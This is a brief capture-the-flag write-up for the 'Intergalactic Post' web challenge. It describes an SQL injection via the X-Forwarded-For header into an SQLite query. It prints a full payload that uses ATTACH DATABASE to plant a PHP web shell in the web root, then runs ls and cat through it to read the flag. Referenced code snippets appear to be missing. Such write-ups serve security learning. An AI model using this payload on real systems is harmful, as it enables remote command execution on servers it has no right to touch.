Cyber Apocalypse 2022 — Intergalactic Post

The challenge was from Web category and we were provided the source code of the web application.

Vulnerability

The vulnerability is in the Database.php file, which passes the user input unsanitized to a SQL Query:

The IP Address comes from SubscriberModel.php, which reads it from the HTTP headers.

Command Injection

From the source code we could see that the web app is using SQLite Database. I have inserted the following SQL query to the x-forwarded-for header:

foo', 'foo');ATTACH DATABASE '/www/test3.php' AS lol;CREATE TABLE lol.pwn (dataz text);INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>"); ?>');--

Next, I have enumerated first the / directory with ls. So I knew the name of the flag. Because it gets a random ending after flag_. For that I have send a GET request and set the cmd parameter to “ls”. After that I was able to retrieve the flag by running “cat <flag name>” by sending a GET request and setting the cmd parameter: